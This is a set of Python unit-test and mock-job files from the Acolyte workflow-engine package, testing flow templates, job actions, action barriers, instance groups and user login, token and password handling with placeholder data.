self._job_action_data_dao.delete_by_job_instance_id(
job_instance.id)
class MockContext(AbstractFlowContext):
def __init__(self, executor, config, flow_instance_id, job_instance_id,
job_action_id, current_step):
super().__init__(executor, config)
self._flow_instance_id = flow_instance_id
self._job_instance_id = job_instance_id
self._job_action_id = job_action_id
self._current_step = current_step
self._saved_data = {
flow_instance_id: {
job_instance_id: {
}
}
}
self._context_data = {}
@property
def context_data(self):
return self._context_data
@property
def saved_data(self):
return self._saved_data
def failure(self):
...
def finish(self):
...
def __getitem__(self, key):
return self._context_data[key]
def __setitem__(self, key, value):
self._context_data[key] = value
def __delitem__(self, key):
del self._context_data[key]
def __len__(self):
return len(self._context_data)
def __iter__(self):
return self._context_data.keys()
def get(self, key, default):
return self._context_data.get(key, default)
def items(self):
return self._context_data.items()
def keys(self):
return self._context_data.keys()
def values(self):
return self._context_data.values()
def save(self, data):
self._saved_data[self._flow_instance_id][
self._job_instance_id][self._job_action_id] = data | Acolyte | /Acolyte-0.0.1.tar.gz/Acolyte-0.0.1/acolyte/testing/__init__.py | __init__.py |
from acolyte.testing import EasemobFlowTestCase
from acolyte.core.storage.flow_template import FlowTemplateDAO
from acolyte.core.storage.flow_instance import FlowInstanceDAO
from acolyte.core.storage.job_instance import JobInstanceDAO
from acolyte.core.storage.job_action_data import JobActionDataDAO
from acolyte.core.storage.flow_discard_reason import FlowDiscardReasonDAO
class AbstractFlowExecTestCase(EasemobFlowTestCase):
def setUp(self):
self._db = self._("db")
self._flow_exec = self._("FlowExecutorService")
self._flow_service = self._("FlowService")
self._job_service = self._("JobService")
self._flow_tpl_dao = FlowTemplateDAO(self._db)
self._flow_instance_dao = FlowInstanceDAO(self._db)
self._job_instance_dao = JobInstanceDAO(self._db)
self._job_action_data_dao = JobActionDataDAO(self._db)
self._flow_discard_reason_dao = FlowDiscardReasonDAO(self._db)
self._flow_tpl_id_collector = []
self._flow_instance_id_collector = []
# 创建一个flow template供测试使用
bind_args = {
"echo": {
"trigger": {
"b": "$config.b"
},
"multiply": {
"c": 3
},
"minus": {
"d": 11,
"e": 12
}
}
}
rs = self._flow_service.create_flow_template(
flow_meta_name="test_flow",
name="sam_test",
bind_args=bind_args,
max_run_instance=1,
config={"dev_email": "[email protected]", "b": 2},
creator=1
)
self.print_json(rs)
self._tpl_id = rs.data.id
self._flow_tpl_id_collector.append(self._tpl_id)
def tearDown(self):
# 各种清数据
if self._flow_tpl_id_collector:
self._flow_tpl_dao.delete_by_id(self._flow_tpl_id_collector)
if self._flow_instance_id_collector:
self._flow_instance_dao.delete_by_instance_id(
self._flow_instance_id_collector)
for flow_instance_id in self._flow_instance_id_collector:
job_instance_lst = self._job_instance_dao.\
query_by_flow_instance_id(flow_instance_id)
self._job_instance_dao.delete_by_flow_instance_id(
flow_instance_id)
self._flow_discard_reason_dao.\
delete_by_flow_instance_id(flow_instance_id)
for job_instance in job_instance_lst:
self._job_action_data_dao.delete_by_job_instance_id(
job_instance.id)
# 清除上下文
self._db.execute("truncate flow_context", tuple())
class FlowExecutorServiceTestCase(AbstractFlowExecTestCase):
def setUp(self):
super(FlowExecutorServiceTestCase, self).setUp()
def testStartFlow(self):
"""测试启动flow实例
"""
# 正常启动的情况
rs = self._flow_exec.start_flow(
flow_template_id=self._tpl_id,
initiator=1,
description="测试flow instance",
start_flow_args={"x": 5, "y": 6}
)
self.assertResultSuccess(rs)
self.assertTrue(rs.data.id > 0)
self._flow_instance_id_collector.append(rs.data.id)
# 使用一个不存在的tpl
rs = self._flow_exec.start_flow(
flow_template_id=100086,
initiator=1,
description="测试flow instance",
start_flow_args={"x": 5, "y": 6}
)
self.assertResultBadRequest(rs, "invalid_flow_template")
# 不合法的initiator
rs = self._flow_exec.start_flow(
flow_template_id=self._tpl_id,
initiator=100086,
description="测试flow instance",
start_flow_args={"x": 5, "y": 6}
)
self.assertResultBadRequest(rs, "invalid_initiator")
# 不合法的start参数
rs = self._flow_exec.start_flow(
flow_template_id=self._tpl_id,
initiator=1,
description="测试flow instance",
start_flow_args={"x": "aaaa", "y": 6}
)
self.assertResultBadRequest(rs, "start.x_invalid_type")
# 同时运行多个实例
rs = self._flow_exec.start_flow(
flow_template_id=self._tpl_id,
initiator=1,
description="测试flow instance",
start_flow_args={"x": "5", "y": 6}
)
self.assertResultBadRequest(rs, "too_many_instance")
def testHandleJobActions(self):
"""测试Job Action的处理流程
"""
# 创建一个Flow Instance先
rs = self._flow_exec.start_flow(
flow_template_id=self._tpl_id,
initiator=1,
description="测试flow instance",
start_flow_args={"x": 5, "y": 6}
)
flow_instance = rs.data
self._flow_instance_id_collector.append(flow_instance.id)
# 执行一个不该执行的job step
rs = self._flow_exec.handle_job_action(
flow_instance_id=flow_instance.id,
target_step="old_man",
target_action="trigger",
actor=1,
action_args={
"c": 5
}
)
self.print_json(rs)
self.assertResultBadRequest(rs, "invalid_target_step")
# 未trigger先执行一个action
rs = self._flow_exec.handle_job_action(
flow_instance_id=flow_instance.id,
target_step="echo",
target_action="multiply",
actor=1,
action_args={
"c": 5
}
)
self.print_json(rs)
self.assertResultBadRequest(rs, "no_trigger")
# 测试正常执行trigger
rs = self._flow_exec.handle_job_action(
flow_instance_id=flow_instance.id,
target_step="echo",
target_action="trigger",
actor=1,
action_args={}
)
self.print_json(rs)
self.assertResultSuccess(rs)
self.assertEqual(rs.data, 7)
# 重复执行相同的action
rs = self._flow_exec.handle_job_action(
flow_instance_id=flow_instance.id,
target_step="echo",
target_action="trigger",
actor=1,
action_args={}
)
self.print_json(rs)
self.assertResultBadRequest(rs, "action_already_runned")
# actor不合法
rs = self._flow_exec.handle_job_action(
flow_instance_id=flow_instance.id,
target_step="echo",
target_action="multiply",
actor=100086,
action_args={
"c": 5
}
)
self.print_json(rs)
self.assertResultBadRequest(rs, "invalid_actor")
# 不合法的step name
rs = self._flow_exec.handle_job_action(
flow_instance_id=flow_instance.id,
target_step="eeeeeee",
target_action="multiply",
actor=1,
action_args={
"c": 5
}
)
self.print_json(rs)
self.assertResultBadRequest(rs, "unknown_target_step")
# 不合法的action name
rs = self._flow_exec.handle_job_action(
flow_instance_id=flow_instance.id,
target_step="echo",
target_action="xxxxxxx",
actor=1,
action_args={
"c": 5
}
)
self.print_json(rs)
self.assertResultBadRequest(rs, "unknown_action_handler")
# 传入错误的flow_instance_id
rs = self._flow_exec.handle_job_action(
flow_instance_id=9999999,
target_step="echo",
target_action="multiply",
actor=1,
action_args={
"c": 5
}
)
self.print_json(rs)
self.assertResultBadRequest(rs, "invalid_flow_instance")
# 当前step未完成,直接执行下一个
rs = self._flow_exec.handle_job_action(
flow_instance_id=flow_instance.id,
target_step="old_man",
target_action="trigger",
actor=1,
action_args={}
)
self.print_json(rs)
self.assertResultBadRequest(rs, "current_step_unfinished")
# 继续执行multiply action
rs = self._flow_exec.handle_job_action(
flow_instance_id=flow_instance.id,
target_step="echo",
target_action="multiply",
actor=1,
action_args={
"c": 2
}
)
self.print_json(rs)
self.assertResultSuccess(rs)
self.assertEqual(rs.data, 14)
# 执行minus action,该action将执行finish
rs = self._flow_exec.handle_job_action(
flow_instance_id=flow_instance.id,
target_step="echo",
target_action="minus",
actor=1,
action_args={
"d": 1,
"e": 2
}
)
self.print_json(rs)
self.assertResultSuccess(rs)
self.assertEqual(rs.data, 11)
# echo step被finish之后再重新执行一次
rs = self._flow_exec.handle_job_action(
flow_instance_id=flow_instance.id,
target_step="echo",
target_action="trigger",
actor=1,
action_args={}
)
self.print_json(rs)
self.assertResultBadRequest(rs, "step_already_runned")
# 执行下一个step - old man
rs = self._flow_exec.handle_job_action(
flow_instance_id=flow_instance.id,
target_step="old_man",
target_action="trigger",
actor=1,
action_args={}
)
self.print_json(rs)
self.assertResultSuccess(rs)
# 执行下一个action,返回bad request result
rs = self._flow_exec.handle_job_action(
flow_instance_id=flow_instance.id,
target_step="old_man",
target_action="question",
actor=1,
action_args={
"question": "是不是钦定"
}
)
self.print_json(rs)
self.assertResultBadRequest(rs, "old_man_angry")
# 再来一次,这次返回ok result
rs = self._flow_exec.handle_job_action(
flow_instance_id=flow_instance.id,
target_step="old_man",
target_action="question",
actor=1,
action_args={
"question": "董先森连任好不好啊"
}
)
self.print_json(rs)
self.assertResultSuccess(rs)
self.assertEqual(rs.data, "吼啊")
# 执行下一个step, 该step完成时会触发flow_meta的on_finish方法
rs = self._flow_exec.handle_job_action(
flow_instance_id=flow_instance.id,
target_step="job_A",
target_action="trigger",
actor=1,
action_args={
"x": 1,
"y": 2
}
)
self.print_json(rs)
self.assertResultSuccess(rs)
self.assertEqual(rs.data, 3)
# 在已经标记为finished的flow_instance上执行
rs = self._flow_exec.handle_job_action(
flow_instance_id=flow_instance.id,
target_step="echo",
target_action="trigger",
actor=1,
action_args={}
)
self.print_json(rs)
self.assertResultBadRequest(rs, "invalid_status")
# 重新走一遍,测试中途failure的情况
rs = self._flow_exec.start_flow(
flow_template_id=self._tpl_id,
initiator=1,
description="测试flow instance",
start_flow_args={"x": 5, "y": 6}
)
flow_instance = rs.data
self._flow_instance_id_collector.append(flow_instance.id)
rs = self._flow_exec.handle_job_action(
flow_instance_id=flow_instance.id,
target_step="echo",
target_action="trigger",
actor=1,
action_args={}
)
self.assertResultSuccess(rs)
self.assertEqual(rs.data, 7)
rs = self._flow_exec.handle_job_action(
flow_instance_id=flow_instance.id,
target_step="echo",
target_action="multiply",
actor=1,
action_args={
"c": 5
}
)
self.assertResultSuccess(rs)
self.assertEqual(rs.data, 35)
rs = self._flow_exec.handle_job_action(
flow_instance_id=flow_instance.id,
target_step="echo",
target_action="minus",
actor=1,
action_args={
"d": 1,
"e": 2
}
)
self.assertResultSuccess(rs)
self.assertEqual(rs.data, 32)
rs = self._flow_exec.handle_job_action(
flow_instance_id=flow_instance.id,
target_step="old_man",
target_action="trigger",
actor=1,
action_args={}
)
self.assertResultSuccess(rs)
# 好! 执行angry action会failure整个flow
rs = self._flow_exec.handle_job_action(
flow_instance_id=flow_instance.id,
target_step="old_man",
target_action="angry",
actor=1,
action_args={}
)
self.assertResultBadRequest(rs, "old_man_angry")
# failure flow之后再去执行某个步骤
rs = self._flow_exec.handle_job_action(
flow_instance_id=flow_instance.id,
target_step="job_A",
target_action="trigger",
actor=1,
action_args={
"x": 1,
"y": 2
}
)
self.assertResultBadRequest(rs, "invalid_status")
def testDiscardFlowInstance(self):
"""测试discard_flow_instance接口
"""
rs = self._flow_exec.start_flow(
flow_template_id=self._tpl_id,
initiator=1,
description="测试flow instance",
start_flow_args={"x": 5, "y": 6}
)
flow_instance = rs.data
self._flow_instance_id_collector.append(flow_instance.id)
# 测试常规的取消
rs = self._flow_exec.discard_flow_instance(flow_instance.id, 1, "test")
self.assertResultSuccess(rs)
# 取消不存在的flow instance
rs = self._flow_exec.discard_flow_instance(999999, 1, "test")
self.assertResultBadRequest(rs, "flow_instance_not_found")
# 重复取消flow
rs = self._flow_exec.discard_flow_instance(flow_instance.id, 1, "test")
self.assertResultBadRequest(rs, "invalid_status")
def tearDown(self):
super(FlowExecutorServiceTestCase, self).tearDown() | Acolyte | /Acolyte-0.0.1.tar.gz/Acolyte-0.0.1/acolyte/testing/core/flow_executor_service.py | flow_executor_service.py |
from acolyte.testing import EasemobFlowTestCase
from acolyte.core.storage.user import UserDAO
class UserServiceTestCase(EasemobFlowTestCase):
def setUp(self):
self._user_service = self._("UserService")
self._new_user_id_collector = [] # 用于收集测试所产生的新用户ID,在teardown中集中处理
def testLogin(self):
"""测试登录操作
"""
# 正常登录
rs = self._user_service.login("[email protected]", "123456")
self.assertResultSuccess(rs)
self.assertEqual(rs.data["id"], 1)
# 账号密码不匹配
rs = self._user_service.login("[email protected]", "654321")
self.assertResultBadRequest(rs, "no_match")
def testAddUser(self):
"""测试添加用户操作的各种情况
"""
# 正常添加
rs = self._user_service.add_user(
email="[email protected]",
password="123456",
name="SamChi",
role=1,
github_account="chihongze",
operator=1
)
self.assertResultSuccess(rs)
self.assertTrue(rs.data.id > 0)
self._new_user_id_collector.append(rs.data.id)
# 邮件不符合规则
rs = self._user_service.add_user(
email="hhhhh",
password="123456",
name="SamChi",
role=1,
github_account="chihongze",
operator=1
)
self.assertResultBadRequest(rs, "email_invalid_format")
# 重复注册
rs = self._user_service.add_user(
email="[email protected]",
password="654321",
name="Jackson",
role=1,
github_account="chihongze",
operator=1
)
self.assertResultBadRequest(rs, "email_exist")
# 指定一个不存在的角色
rs = self._user_service.add_user(
email="[email protected]",
password="789101",
name="Jackson",
role=10000,
github_account="chihongze",
operator=1
)
self.assertResultBadRequest(rs, "role_not_found")
# 指定一个不存在的operator
rs = self._user_service.add_user(
email="[email protected]",
password="789101",
name="Jackson",
role=1,
github_account="chihongze",
operator=10000
)
self.assertResultBadRequest(rs, "operator_not_found")
def testCheckToken(self):
"""测试token检查操作
"""
rs = self._user_service.login(
"[email protected]", "123456")
# 正常的token检测
token = rs.data["token"]
rs = self._user_service.check_token(token)
self.assertResultSuccess(rs)
self.assertEqual(rs.data["id"], 1)
self.assertEqual(rs.data["session_data"]["name"], "Sam")
# 错误token检测
rs = self._user_service.check_token("你们啊!naive!")
self.assertResultBadRequest(rs, "invalid_token")
def testLogout(self):
"""测试退出接口
"""
rs = self._user_service.login(
"[email protected]", "123456")
self.assertResultSuccess(rs)
token = rs.data["token"]
rs = self._user_service.check_token(token)
self.assertResultSuccess(rs)
rs = self._user_service.logout(token)
self.assertResultSuccess(rs)
rs = self._user_service.check_token(token)
self.assertResultBadRequest(rs, "invalid_token")
def testModifyPassword(self):
"""测试修改密码
"""
rs = self._user_service.modify_password(1, "123456", "654321")
self.assertResultSuccess(rs)
rs = self._user_service.modify_password(1, "123456", "654321")
self.assertResultBadRequest(rs, "old_password_incorrect")
self._user_service.modify_password(1, "654321", "123456")
def tearDown(self):
user_dao = UserDAO(self._("db"))
if self._new_user_id_collector:
user_dao.delete_by_id(self._new_user_id_collector) | Acolyte | /Acolyte-0.0.1.tar.gz/Acolyte-0.0.1/acolyte/testing/core/user_service.py | user_service.py |
from acolyte.core.job import (
AbstractJob,
ActionArg,
action_args,
action_constraint,
ActionLockType,
ActionLock,
ActionRunTimes,
)
from acolyte.core.service import Result
from acolyte.util.validate import IntField, StrField
from acolyte.core.action_queue import (
MySQLActionQueue,
Task
)
class EchoJob(AbstractJob):
"""该Job用于测试,打印事件和参数,并返回接收到的参数
"""
def __init__(self):
super().__init__(
"echo",
"test job echo",
action_queues=[
MySQLActionQueue(
"test", "queue_init", "consume", "ack"),
]
)
self._test_barrier = ("a", "b", "c")
@action_args(
ActionArg(IntField("a", required=True), ActionArg.MARK_CONST, "a的值"),
ActionArg(IntField("b", required=True), ActionArg.MARK_STATIC, "b的值"),
)
def on_trigger(self, context, a, b):
print("I received args: a={a}, b={b}".format(
a=a,
b=b
))
r = a + b
context["add_result"] = r
return Result.ok(data=r)
@action_args(
ActionArg(IntField("c", required=True), ActionArg.MARK_AUTO, "c的值")
)
def on_multiply(self, context, c):
print("I received args: c={c}".format(c=c))
r = int(context["add_result"]) * c
context["multiply_result"] = r
return Result.ok(data=r)
@action_args(
ActionArg(IntField("d", required=True), ActionArg.MARK_AUTO, "d的值"),
ActionArg(IntField("e", required=True), ActionArg.MARK_AUTO, "e的值")
)
def on_minus(self, context, d, e):
print("I received args: d={d}, e={e}".format(d=d, e=e))
r = int(context["multiply_result"]) - d - e
context.finish()
return Result.ok(data=r)
@action_args(
ActionArg(IntField("sleep_time", required=True),
ActionArg.MARK_AUTO, "sleep time"),
)
def on_pass(self, context):
...
def on_a(self, context):
context.finish(waiting_for=self._test_barrier)
def on_b(self, context):
context.finish(waiting_for=self._test_barrier)
def on_c(self, context):
context.finish(waiting_for=self._test_barrier)
@action_constraint(
lock=ActionLock("repeat_action", ActionLockType.USER_EXCLUSIVE_LOCK),
run_times=ActionRunTimes.NO_LIMIT
)
def on_repeat(self, context):
context.save({"a": 1})
def on_queue_init(self, context):
tasks = [Task.from_args({"count": i}) for i in range(5)]
context.queue.test.init(*tasks, trigger_consume_action=True)
@action_constraint(
lock=None,
run_times=ActionRunTimes.NO_LIMIT
)
def on_consume(self, context):
task = context.queue.test.take()
if task:
print(task.args)
@action_args(
ActionArg(
IntField("task_id", required=True),
mark=ActionArg.MARK_AUTO,
comment="任务ID"
),
)
@action_constraint(
lock=None,
run_times=ActionRunTimes.NO_LIMIT
)
def on_ack(self, context, task_id):
context.queue.test.ack(task_id, trigger_consume_action=True,
auto_finish=True)
class OldManJob(AbstractJob):
"""Mock Job 长者Job
"""
def __init__(self):
super().__init__("old_man", "old man job")
def on_trigger(self, context):
print("old man job on trigger")
return Result.ok(data="跑的比谁都快")
@action_args(
ActionArg(
StrField("question", required=True), ActionArg.MARK_AUTO, "向长者提问")
)
def on_question(self, context, question):
if question == "董先森连任好不好啊":
context.finish()
return Result.ok(data="吼啊")
else:
return Result.bad_request("old_man_angry", msg="无可奉告")
def on_angry(self, context):
print("I'm angry! 你们这样子是不行的!我要终止整个flow!")
context.failure()
return Result.bad_request("old_man_angry", msg="I'm angry!")
def letter_job_meta(letter):
class LetterJobMeta(type):
def __new__(cls, name, bases, attrs):
def _make_method(action):
@action_args(
ActionArg(
IntField("x", required=True),
ActionArg.MARK_AUTO, "arg x"),
ActionArg(
IntField("y", required=True),
ActionArg.MARK_AUTO, "arg y")
)
def method(self, context, x, y):
context.finish()
return Result.ok(data=(x + y))
return method
attrs["on_trigger"] = _make_method("trigger")
attrs["__init__"] = lambda self: AbstractJob.__init__(
self, "job_" + letter, "job " + letter)
bases += (AbstractJob,)
return type(name, bases, attrs)
return LetterJobMeta
class AJob(metaclass=letter_job_meta("A")):
...
class BJob(metaclass=letter_job_meta("B")):
...
class CJob(metaclass=letter_job_meta("C")):
...
class DJob(metaclass=letter_job_meta("D")):
... | Acolyte | /Acolyte-0.0.1.tar.gz/Acolyte-0.0.1/acolyte/testing/core/job.py | job.py |
from acolyte.core.service import Result
from acolyte.testing import EasemobFlowTestCase
from acolyte.core.storage.flow_template import FlowTemplateDAO
class FlowServiceTestCase(EasemobFlowTestCase):
def setUp(self):
self.flow_service = self._("FlowService")
self.flow_meta_mgr = self._("flow_meta_manager")
self.flow_tpl_dao = FlowTemplateDAO(self._("db"))
self._flow_tpl_collector = []
def test_get_all_flow_meta(self):
"""测试获取所有的flow meta对象信息
"""
result = self.flow_service.get_all_flow_meta()
self.assertEqual(result.status_code, Result.STATUS_SUCCESS)
def test_get_flow_meta_info(self):
"""测试获取单个flow_meta对象
"""
# 测试正常返回的情况
result = self.flow_service.get_flow_meta_info("test_flow")
self.assertEqual(result.status_code, Result.STATUS_SUCCESS)
# 找不到指定的flow meta
result = self.flow_service.get_flow_meta_info("heheda")
self.assertEqual(result.status_code, Result.STATUS_BADREQUEST)
self.assertEqual(result.reason, "flow_meta_not_exist")
def testValidateTplBindArgs(self):
"""测试验证绑定参数
"""
flow_meta = self.flow_meta_mgr.get("test_flow")
# 正常验证通过
rs = self.flow_service._validate_tpl_bind_args(flow_meta, {}, {
"echo": {
"trigger": {
"b": 2
},
"multiply": {
"c": 10
},
"minus": {
"d": 2,
"e": 3
}
}
})
self.assertResultSuccess(rs)
# 测试是否能对参数应用转换
rs = self.flow_service._validate_tpl_bind_args(flow_meta, {}, {
"echo": {
"trigger": {
"b": "2",
},
"multiply": {
"c": "3",
},
"minus": {
"d": "11",
"e": "12"
}
}
})
self.assertResultSuccess(rs)
# 测试出错的情况
rs = self.flow_service._validate_tpl_bind_args(flow_meta, {}, {
"echo": {
"trigger": {
"b": 2
},
"multiply": {
"c": 3
},
"minus": {
"d": "1a",
"e": "10"
},
}
})
self.assertResultBadRequest(rs, "echo_minus_d_invalid_type")
def testCreateFlowTemplate(self):
"""测试创建flow template
"""
bind_args = {
"echo": {
"trigger": {
"b": 2
},
"multiply": {
"c": 3
},
"minus": {
"d": 11,
"e": 12
}
}
}
# 正常创建
rs = self.flow_service.create_flow_template(
flow_meta_name="test_flow",
name="sam_test",
bind_args=bind_args,
max_run_instance=1,
config={},
creator=1
)
self.assertResultSuccess(rs)
self._flow_tpl_collector.append(rs.data.id)
# 创建重名
rs = self.flow_service.create_flow_template(
flow_meta_name="test_flow",
name="sam_test",
bind_args=bind_args,
max_run_instance=1,
config={},
creator=1
)
self.assertResultBadRequest(rs, "name_already_exist")
# flow meta不存在
rs = self.flow_service.create_flow_template(
flow_meta_name="test_flow_x",
name="sam_testx",
bind_args=bind_args,
max_run_instance=1,
config={},
creator=1
)
self.assertResultBadRequest(rs, "flow_meta_not_exist")
# creator不存在
rs = self.flow_service.create_flow_template(
flow_meta_name="test_flow",
name="sam_test_x",
bind_args=bind_args,
max_run_instance=1,
config={},
creator=2
)
self.assertResultBadRequest(rs, "invalid_creator_id")
# bind_args验证出问题
err_bind_args = {
"echo": {
"trigger": {
"b": 2
},
"multiply": {
"c": 3
},
"minus": {
"d": "1a",
"e": "1"
}
}
}
rs = self.flow_service.create_flow_template(
flow_meta_name="test_flow",
name="sam_test_x",
bind_args=err_bind_args,
max_run_instance=1,
config={},
creator=1
)
self.assertResultBadRequest(rs, "echo_minus_d_invalid_type")
def testModifyFlowTemplate(self):
"""测试修改Flow template
"""
flow_tpl_s = self._create_tpl("sam_test")
flow_tpl_j = self._create_tpl("jack_test")
default_bind_args = {
"echo": {
"trigger": {
"b": 2
},
"multiply": {
"c": 3
},
"minus": {
"d": 11,
"e": 12
}
}
}
# 试图修改一个不存在的ID
rs = self.flow_service.modify_flow_template(
flow_tpl_id=10000,
name="aaaaa",
bind_args={
},
max_run_instance=1,
config={
}
)
self.assertResultBadRequest(rs, "tpl_not_found")
# 测试修改名称
# 原封不动
rs = self.flow_service.modify_flow_template(
flow_tpl_id=flow_tpl_s.id,
name=flow_tpl_s.name,
bind_args=default_bind_args,
max_run_instance=1,
config={}
)
self.assertResultSuccess(rs)
# 名称被改,但是已经存在了
rs = self.flow_service.modify_flow_template(
flow_tpl_id=flow_tpl_s.id,
name=flow_tpl_j.name,
bind_args=default_bind_args,
max_run_instance=1,
config={
}
)
self.assertResultBadRequest(rs, "name_exist")
# 使用新的名字
rs = self.flow_service.modify_flow_template(
flow_tpl_id=flow_tpl_s.id,
name="test_x",
bind_args=default_bind_args,
max_run_instance=1,
config={}
)
tpl = self.flow_tpl_dao.query_flow_template_by_id(
flow_tpl_s.id)
self.assertEqual(tpl.name, "test_x")
# 测试修改绑定参数
# 使用错误的参数
rs = self.flow_service.modify_flow_template(
flow_tpl_id=flow_tpl_s.id,
name="test_x",
bind_args={
"echo": {
"trigger": {
"b": "xxxxxx"
},
"multiply": {
"c": 3
},
"minus": {
"d": 11,
"e": 12
}
}
},
max_run_instance=1,
config={}
)
self.assertResultBadRequest(rs, "echo_trigger_b_invalid_type")
# 使用正确的参数
rs = self.flow_service.modify_flow_template(
flow_tpl_id=flow_tpl_s.id,
name="test_x",
bind_args={
"echo": {
"trigger": {
"b": "50"
},
"multiply": {
"c": 3
},
"minus": {
"d": 11,
"e": 12
}
}
},
max_run_instance=1,
config={}
)
self.assertResultSuccess(rs)
tpl = self.flow_tpl_dao.query_flow_template_by_id(
flow_tpl_s.id)
self.assertEqual(
tpl.bind_args["echo"]["trigger"]["b"], 50)
# 修改所有
rs = self.flow_service.modify_flow_template(
flow_tpl_id=flow_tpl_s.id,
name="test_y",
bind_args={
"echo": {
"trigger": {
"b": "100"
},
"multiply": {
"c": 3
},
"minus": {
"d": 11,
"e": 12
}
}
},
max_run_instance=2,
config={
"x": 1,
"y": 2
}
)
self.assertResultSuccess(rs)
tpl = self.flow_tpl_dao.query_flow_template_by_id(flow_tpl_s.id)
self.assertEqual(tpl.bind_args["echo"]["trigger"]["b"], 100)
self.assertEqual(tpl.max_run_instance, 2)
self.assertEqual(tpl.config, {"x": 1, "y": 2})
def testGetAllFlowTemplates(self):
rs = self.flow_service.create_flow_template(
flow_meta_name="test_flow",
name="sam_test",
bind_args={
"echo": {
"trigger": {
"b": 2
},
"multiply": {
"c": 3
},
"minus": {
"d": 11,
"e": 12
}
}
},
max_run_instance=1,
config={},
creator=1
)
self._flow_tpl_collector.append(rs.data.id)
rs = self.flow_service.get_all_flow_templates()
self.assertResultSuccess(rs)
self.assertEqual(len(rs.data), 1)
def _create_tpl(self, tpl_name):
rs = self.flow_service.create_flow_template(
flow_meta_name="test_flow",
name=tpl_name,
bind_args={
"echo": {
"trigger": {
"b": 2
},
"multiply": {
"c": 3
},
"minus": {
"d": 11,
"e": 12
}
}
},
max_run_instance=1,
config={},
creator=1
)
flow_tpl_id = rs.data.id
self._flow_tpl_collector.append(flow_tpl_id)
self.assertResultSuccess(rs)
return rs.data
def tearDown(self):
if self._flow_tpl_collector:
self.flow_tpl_dao.delete_by_id(self._flow_tpl_collector) | Acolyte | /Acolyte-0.0.1.tar.gz/Acolyte-0.0.1/acolyte/testing/core/flow_service.py | flow_service.py |
from acolyte.core.job import JobStatus
from acolyte.testing.core.flow_executor_service import (
AbstractFlowExecTestCase
)
class ActionBarrierTestCase(AbstractFlowExecTestCase):
def setUp(self):
super(ActionBarrierTestCase, self).setUp()
def testActionBarrier(self):
"""测试action barrier的执行
"""
# 开启一个新的flow instance
rs = self._flow_exec.start_flow(
flow_template_id=self._tpl_id,
initiator=1,
description="测试flow instance",
start_flow_args={"x": 5, "y": 6}
)
flow_instance = rs.data
self._flow_instance_id_collector.append(flow_instance.id)
# 执行 trigger
rs = self._flow_exec.handle_job_action(
flow_instance_id=flow_instance.id,
target_step="echo",
target_action="trigger",
actor=1,
action_args={
}
)
self.print_json(rs)
# 执行a action
rs = self._flow_exec.handle_job_action(
flow_instance_id=flow_instance.id,
target_step="echo",
target_action="a",
actor=1,
action_args={
}
)
self.print_json(rs)
self.assertJobInstanceStatus(
flow_instance.id, "echo", JobStatus.STATUS_RUNNING)
# 执行b action
rs = self._flow_exec.handle_job_action(
flow_instance_id=flow_instance.id,
target_step="echo",
target_action="b",
actor=1,
action_args={
}
)
self.print_json(rs)
self.assertJobInstanceStatus(
flow_instance.id, "echo", JobStatus.STATUS_RUNNING)
# 执行c action
rs = self._flow_exec.handle_job_action(
flow_instance_id=flow_instance.id,
target_step="echo",
target_action="c",
actor=1,
action_args={
}
)
self.print_json(rs)
self.assertJobInstanceStatus(
flow_instance.id, "echo", JobStatus.STATUS_FINISHED)
def assertJobInstanceStatus(self, flow_instance_id, step_name, status):
job_instance = self._job_instance_dao.\
query_by_instance_id_and_step(flow_instance_id, step_name)
self.assertEqual(job_instance.status, status)
def tearDown(self):
super(ActionBarrierTestCase, self).tearDown() | Acolyte | /Acolyte-0.0.1.tar.gz/Acolyte-0.0.1/acolyte/testing/core/action_barrier.py | action_barrier.py |
import datetime
import acolyte.testing.core.flow_executor_service as fes
from acolyte.core.storage.flow_instance_group import (
FlowInstanceGroupDAO,
FlowInstanceGroupRelationDAO
)
class FlowInstanceGroupTestCase(fes.AbstractFlowExecTestCase):
def setUp(self):
super(FlowInstanceGroupTestCase, self).setUp()
self._group_id_collector = []
self._flow_instance_group_dao = FlowInstanceGroupDAO(self._db)
self._flow_instance_group_rlt_dao = FlowInstanceGroupRelationDAO(
self._db)
# 创建一个flow template供测试使用
bind_args = {
"echo": {
"trigger": {
"b": "$config.b"
},
"multiply": {
"c": 3
},
"minus": {
"d": 11,
"e": 12
}
}
}
rs = self._flow_service.create_flow_template(
flow_meta_name="test_flow",
name="sam_test_x",
bind_args=bind_args,
max_run_instance=0,
config={"dev_email": "[email protected]", "b": 2},
creator=1
)
self._tpl_id = rs.data.id
self._flow_tpl_id_collector.append(self._tpl_id)
def testGroupOperation(self):
"""测试flow instance group的相关操作
"""
begin_date = datetime.date.today()
# 创建 flow instance group
rs = self._flow_exec.create_flow_instance_group(
name="rest_v1.4.2",
description="rest v1.4.2 更新",
meta={}
)
self.assertResultSuccess(rs)
self._group_id_collector.append(rs.data.id)
group_id = rs.data.id
# 创建同名的 flow instance group
rs = self._flow_exec.create_flow_instance_group(
name="rest_v1.4.2",
description="rest v1.4.2 更新",
meta={}
)
self.assertResultBadRequest(rs, "group_existed")
# 创建隶属该组的flow instance
instance_id_lst = []
for _ in range(5):
rs = self._flow_exec.start_flow(
flow_template_id=self._tpl_id,
initiator=1,
description="hehehe",
start_flow_args={
"x": 5, "y": 6
},
group=group_id
)
self.assertResultSuccess(rs)
flow_instance_id = rs.data.id
instance_id_lst.append(flow_instance_id)
self._flow_instance_id_collector.append(flow_instance_id)
self.assertTrue(self._flow_instance_group_rlt_dao
.is_in_group(flow_instance_id, group_id))
# 丢弃一个instance
self._flow_exec.discard_flow_instance(
flow_instance_id=instance_id_lst[0],
actor_id=1,
discard_reason="呵呵"
)
# 测试视图查看
# 查看某group详情
rs = self._flow_service.get_flow_instance_group_details(group_id)
self.print_json(rs)
self.assertResultSuccess(rs)
# 查看group历史
end_date = begin_date
rs = self._flow_service.get_flow_instance_group_history(
begin_date, end_date)
self.print_json(rs)
self.assertResultSuccess(rs)
group_status = rs.data[0].sub_flow_status
self.assertEqual(group_status["running"], 4)
self.assertEqual(group_status["discard"], 1)
def tearDown(self):
super(FlowInstanceGroupTestCase, self).tearDown()
for group_id in self._group_id_collector:
self._flow_instance_group_dao.delete(group_id)
self._flow_instance_group_rlt_dao.delete_by_group_id(group_id) | Acolyte | /Acolyte-0.0.1.tar.gz/Acolyte-0.0.1/acolyte/testing/core/flow_instance_group.py | flow_instance_group.py |
from acolyte.testing.core.job import (
EchoJob,
OldManJob,
AJob,
BJob,
CJob,
DJob,
)
from acolyte.core.mgr import (
DictBasedManager,
JobManager
)
from acolyte.core.job import JobRef
from acolyte.core.flow import FlowMeta
from acolyte.core.notify import NotifyTemplate
from acolyte.util.validate import (
IntField,
declare_args
)
